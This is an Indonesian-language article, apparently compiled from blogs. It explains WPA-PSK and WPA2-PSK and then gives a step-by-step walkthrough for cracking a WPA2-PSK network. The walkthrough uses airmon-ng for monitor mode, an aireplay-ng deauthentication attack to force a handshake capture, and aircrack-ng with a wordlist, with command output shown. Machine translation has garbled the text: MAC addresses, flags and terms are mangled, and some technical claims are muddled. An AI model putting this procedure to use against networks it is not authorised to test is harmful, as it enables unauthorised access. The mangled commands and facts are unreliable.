Akses Point WPA Tkip AES Access Point Access Point Jaringan Nirkabel
Akses Point WPA Tkip AES Access Point Access Point Jaringan Nirkabel
WPA-PSK
WPA-PSK (Wi-Fi Protected Access Pre Shared Key) adalah pengamanan jaringan
nirkabel dengan menggunakan metoda WPA-PSK jika tidak ada authentikasi server yang
digunakan. Dengan demikian access point dapat dijalankan dengan mode WPA tanpa
menggunakan bantuan komputer lain sebagai server. Cara mengkonfigurasikannya juga cukup
sederhana. Perlu diketahui bahwa tidak semua access point akan mempunyai fasilitas yang sama
dan tidak semua access point menggunakan cara yang sama dalam mendapatkan Shared-Key
yang akan dibagikan ke client.
2. WPA2-PSK
WPA2-PSK adalah security terbaru untuk wireless, dan lebih bagus dari WEP dan WPA-
PSK, tetapi masih bisa untuk dicrack atau disadap tetapi sangat memakan banyak waktu. Dalam
WPA2-PSK ada dua jenis decryption, Advanced Encryption Standard (AES) dan Temporal Key
Integrity Protocol (TKIP). TKIP banyak kelemahan oleh itu lebih baik anda gunakan AES.
Panjang key adalah 8-63, anda boleh memasukkan sama ada 64 hexadecimal atau ASCII(seperti
biasa).
3. CARA KERJA WPA-PSK DAN WPA2-PSK
pemberian Shared-Key dilakukan secara manual tanpa mengetahui algoritma apa yang
digunakan. Keadaan ini berbanding terbalik dengan akses point Linksys WRT54G, dimana
administrator dapat memilih dari dua algoritma WPA yang disediakan, yang terdiri dari
algoritma TKIP atau algoritma AES.
Setelah Shared-Key didapat, maka client yang akan bergabung dengan access point cukup
memasukkan angka/kode yang diijinkan dan dikenal oleh access point. Prinsip kerja yang
digunakan WPA-PSK sangat mirip dengan pengamanan jaringan nirkabel dengan menggunakan
metoda Shared-Key.
B. WPA2-PSK
1. Masukkan antarmuka mode monitor
2. Cari jaringan nirkabel (dilindungi dengan WPA2 dan Pre Shared Key)
3. Ambil semua paket
4. Tunggu sampai Anda melihat deauthenticate klien dan klien, sehingga jabat tangan
yang dapat ditangkap
5. Crack tombol menggunakan file kamus (atau melalui John The Ripper)
6. Saya akan menggunakan DWL Teknis-G122 (USB) interface jaringan nirkabel
untuk prosedur ini. Dalam backtrack4, perangkat ini diakui sebagai wlan0.
Pertama, memasukkan kartu ke dalam mode monitor:
root @ bt: ~ # airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root @ bt: ~ # airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(Monitor mode diaktifkan pada mon0)
9. Pada titik ini, Anda punya opsi 2: baik menunggu sampai klien menghubungkan
dan jabat tangan 4-arah yang lengkap, atau deauthenticate klien yang ada dan
dengan demikian memaksanya untuk reassociate. Waktu adalah uang, jadi mari kita
kekuatan deauthenticate tersebut. Kami membutuhkan bssid dari AP (-a) dan mac
dari klien yang terhubung (-c)
root @ bt: ~ # aireplay-ng -0 1-a 00:19:05 B: 52: AD: F7-c 00:01 C: BF: 90:5 B: mon0 A3
13:04:19 Menunggu frame suar (BSSID: 00:19:05 B: 52: AD: F7)
pada saluran 10
Mengirim 13:04:20 diarahkan DeAuth 64. STMAC: [00:01 C: BF: 90:5 B: A3] [67 | 66 ACK]
Akibatnya, airodump-ng harus menunjukkan "WPA Handshake:" di sudut kanan atas
CH 10] [TERPAKAI: 2 menit] [2009/02/21 13:04] [jabat tangan WPA: 00:19:05 B: 52: AD: F7
BSSID PWR Beacons # Data RXQ, # / s CH MB AUTH ESSID Cipher enc
00:19:05 B: 52: AD: F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Lost Tingkat Probe Paket
00:19:05 B: 52: AD: F7 00:01 C: BF: 90:5 B: A3 -27 54-54 0 230
11. Formulir titik ini, Anda tidak perlu mendekati jaringan nirkabel. Semua cracking
akan terjadi offline, sehingga Anda dapat berhenti airodump dan proses lainnya
dan bahkan berjalan jauh dari AP. Bahkan, saya sarankan untuk pergi dan
menemukan sendiri tempat yang nyaman di mana Anda dapat tinggal, makan,
tidur, dll .... Cracking kunci PSK WPA2 didasarkan pada bruteforcing, dan dapat
memakan waktu yang sangat sangat lama. Ada 2 cara bruteforcing: salah satu
yang relatif cepat namun tidak menjamin kesuksesan dan salah satu yang sangat
lambat, tapi menjamin bahwa Anda akan menemukan tombol di beberapa titik
waktu. Opsi pertama adalah dengan menggunakan worklist suatu / file
drstionary. Banyak file-file ini dapat ditemukan di internet (misalnya
www.theargon.com atau di packetstorm (lihat arsip)), atau dapat dihasilkan
dengan alat seperti John The Ripper. Setelah wordlist yang dibuat, semua yang
perlu Anda lakukan adalah menjalankan aircrack-ng dengan worklist dan pakan
dalamnya fie tutup yang berisi Handshake WPA2..
Jadi jika Anda wordlist disebut word.lst (bawah / tmp / wordlists), Anda dapat
menjalankan :
aircrack-ng-w / tmp / wordlists / word.lst-b 00:19:05 B: 52: AD: F7 / tmp/wpa2 topi *
12.Keberhasilan retak tombol WPA2 PSK secara langsung terkait dengan kekuatan
file password Anda. Dengan kata lain, Anda mungkin beruntung dan mendapatkan
kunci yang sangat cepat, atau Anda mungkin tidak mendapatkan kunci sama
sekali.
REFERENSI
- http://raytkj.blogspot.com/2012/05/perbedaan-security-wireless-wpa-wpa2.html
- http://jempol-jempolan.blogspot.com/2011/12/cara-crack-wi-fi-wpa-dan-wpa2-psk.html
- http://masddy.web.id/index.php?option=com_content&view=article&id=58&Itemid=64
- http://youngndifferent.blogspot.com/2012/12/pengertian-wep-wpa-wpa2-psk-dan.html
- http://www.alongrhs.co.nr/